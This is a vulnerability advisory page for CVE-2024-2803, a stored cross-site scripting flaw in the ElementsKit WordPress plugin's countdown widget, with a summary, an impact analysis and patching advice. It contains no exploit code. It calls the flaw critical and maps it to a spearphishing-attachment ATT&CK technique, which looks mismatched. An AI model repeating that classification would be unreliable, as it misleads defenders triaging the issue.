CVE-2024-2803 in ElementsKit Elementor Addons Plugin
Summary
by MITRE • 04/04/2024
The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown widget in all versions up to, and including, 3.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 04/09/2025
The CVE-2024-2803 vulnerability resides within the ElementsKit Elementor addons plugin for WordPress, specifically affecting versions through 3.0.6. This represents a critical security flaw that enables attackers to execute malicious scripts through a countdown widget component. The vulnerability stems from inadequate input sanitization and output escaping mechanisms that fail to properly validate or escape user-supplied attributes before processing them within the plugin's functionality. The flaw affects the plugin's handling of countdown widget parameters, where user input is not sufficiently filtered or escaped before being rendered in web pages, creating an environment where malicious code can persist and execute.
The technical nature of this vulnerability classifies it as a stored cross-site scripting vulnerability under CWE-079 - Improper Neutralization of Input During Web Page Generation. This means that malicious scripts are stored on the server and executed when other users access pages containing the injected content, rather than being reflected in responses. The attack vector requires authenticated access at the contributor level or higher, which represents a significant concern as it allows users with relatively low privileges to compromise the entire site's security. The vulnerability impacts the plugin's countdown widget functionality where user attributes are processed without proper sanitization, creating a persistent threat that can affect any user who views pages containing the maliciously injected content.
From an operational perspective, this vulnerability presents a substantial risk to WordPress sites utilizing the ElementsKit plugin, as it enables attackers to potentially steal user sessions, deface websites, or redirect visitors to malicious sites. The stored nature of the XSS means that once an attacker successfully injects malicious code, it will execute for all users who access affected pages, potentially affecting hundreds or thousands of site visitors depending on the site's traffic. The impact extends beyond simple script execution to include potential data exfiltration, credential theft, and site defacement. The vulnerability's exploitation requires minimal privileges, making it particularly dangerous as it can be leveraged by users who should not have such capabilities within the WordPress ecosystem.
Mitigation strategies should focus on immediate patching of the ElementsKit plugin to version 3.0.7 or later where the vulnerability has been addressed. Administrators should also implement additional security measures such as restricting contributor-level access to plugin settings and implementing web application firewalls that can detect and block malicious script injection attempts. The vulnerability demonstrates the importance of proper input validation and output escaping practices in web applications, particularly in content management systems where user-generated content is processed. Organizations should also consider implementing security monitoring to detect unusual activity related to plugin modifications and user behavior that might indicate exploitation attempts. This vulnerability aligns with ATT&CK technique T1566.002 - Phishing: Spearphishing Attachment, as it could be exploited through maliciously crafted countdown widget configurations that appear legitimate to users with contributor access levels.